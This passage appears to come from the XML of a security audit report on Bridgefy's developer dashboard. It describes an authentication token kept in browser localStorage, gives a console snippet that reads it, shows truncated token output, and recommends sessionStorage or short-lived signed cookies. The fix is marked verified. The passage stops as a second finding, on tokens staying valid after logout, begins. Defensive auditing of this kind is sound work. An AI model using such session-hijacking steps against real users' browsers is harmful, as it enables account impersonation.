          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>currently</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>data,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>API authentication token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fields.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in this location will survive even when the browser is closed and opened again. If a user does not manually log out and closes the browser, their session could still be hijacked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>via the available tokens. A malicious attacker with physical access to the browser, prior to token expiry and after the user closed the browser, could leverage this weakness to hijack user-sessions, gain access to their information and impersonate users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="4802"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Affected Websites: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://developer.staging.bridgefy.me/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.sdk.bridgefy.services/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This issue can be confirmed by logging into the application and then running the following JavaScript snippet from the browser development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>F12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>most </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>browsers).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Snippet:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.parse(localStorage[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bridgefy-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>])[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"token"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Contents:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="705" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJjbG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>]'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>file:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>main.3cb13c6ff658a262.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{localStorage.setItem(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bridgefy-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>user"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,JSON.stringify(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>))}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to avoid storing sensitive data or auth tokens in HTML5 localStorage. Ideally, storage of user Personally Identifiable Information (PII) on the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>client-side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should be avoided. Such data could be stored exclusively on the server-side. However, if the server-side approach is considered infeasible, a better location would be HTML5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sessionStorage </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>instead of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Unlike </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sessionStorage </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>contents will be deleted when the browser is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>closed. In addition to this, although all client-side tokens are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>deleted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>logs out, using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sessionStorage </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will ensure that the authentication token remains unavailable even when the user just closes the browser. For additional mitigation guidance, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OWASP Session Management Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that the proposed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sessionStorage </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>approach will not work if multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tabs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or website dialogs are used by the application. In such cases, signed cookies with a short expiry should be considered instead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250032" w:id="23"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-006</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>remains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Logout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The application uses a stateless session design implemented with signed JWT tokens valid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
